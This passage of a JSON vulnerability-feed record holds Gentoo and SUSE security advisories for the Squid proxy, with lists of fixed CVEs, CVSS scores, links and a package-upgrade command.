bypass ACL restrictions or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Squid users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-proxy/squid-3.2.13\"", "modified": "2013-09-27T00:00:00", "published": "2013-09-27T00:00:00", "id": "GLSA-201309-22", "href": "https://security.gentoo.org/glsa/201309-22", "type": "gentoo", "title": "Squid: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:13:39", "bulletinFamily": "unix", "description": "This update for squid3 fixes the following issues:\n\n - Multiple issues in pinger ICMP processing. (CVE-2014-7141,\n CVE-2014-7142)\n\n - CVE-2016-3947: Buffer overrun issue in pinger ICMPv6 processing.\n (bsc#973782)\n\n - CVE-2016-4554: fix header smuggling issue in HTTP Request processing\n (bsc#979010)\n\n - Fix multiple Denial of Service issues in HTTP Response processing.\n (CVE-2016-2569, CVE-2016-2570, CVE-2016-2571, CVE-2016-2572, bsc#968392,\n bsc#968393, bsc#968394, bsc#968395)\n - Regression caused by the DoS fixes above (bsc#993299)\n\n - CVE-2016-3948: Fix denial of service in HTTP Response processing\n (bsc#973783)\n\n - CVE-2016-4051: fixes buffer overflow in cachemgr.cgi (bsc#976553)\n\n - CVE-2016-4052, CVE-2016-4053, CVE-2016-4054:\n * fixes multiple issues in ESI processing (bsc#976556)\n\n - CVE-2016-4556: fixes double free vulnerability in Esi.cc (bsc#979008)\n\n - CVE-2015-5400: Improper Protection of Alternate Path (bsc#938715)\n\n - CVE-2014-6270: fix off-by-one in snmp subsystem (bsc#895773)\n\n - Memory leak in squid3 when using external_acl (bsc#976708)\n\n", "modified": "2016-08-16T18:08:55", "published": "2016-08-16T18:08:55", "id": "SUSE-SU-2016:2089-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00040.html", "type": "suse", "title": "Security update for squid3 (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "description": "This update for squid3 fixes the following issues:\n\n - Multiple issues in pinger ICMP processing. (CVE-2014-7141,\n CVE-2014-7142)\n\n - CVE-2016-3947: Buffer overrun issue in pinger ICMPv6 processing.\n (bsc#973782)\n\n - CVE-2016-4554: fix header smuggling issue in HTTP Request processing\n (bsc#979010)\n\n - fix multiple Denial of Service issues in HTTP Response processing.\n (CVE-2016-2569, CVE-2016-2570, CVE-2016-2571, CVE-2016-2572, bsc#968392,\n bsc#968393, bsc#968394, bsc#968395)\n\n - CVE-2016-3948: Fix denial of service in HTTP Response processing\n (bsc#973783)\n\n - CVE-2016-4051: fixes buffer overflow in cachemgr.cgi (bsc#976553)\n\n - CVE-2016-4052, CVE-2016-4053, CVE-2016-4054:\n * fixes multiple issues in ESI processing (bsc#976556)\n\n - CVE-2016-4556: fixes double free vulnerability in Esi.cc (bsc#979008)\n\n - CVE-2015-5400: Improper Protection of Alternate Path (bsc#938715)\n\n - CVE-2014-6270: fix off-by-one in snmp subsystem (bsc#895773)\n\n - Memory leak in squid3 when using external_acl (bsc#976708)\n\n", "modified": "2016-08-09T17:12:26", "published": "2016-08-09T17:12:26", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00010.html", "id": "SUSE-SU-2016:1996-1", "title": "Security update for squid3 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}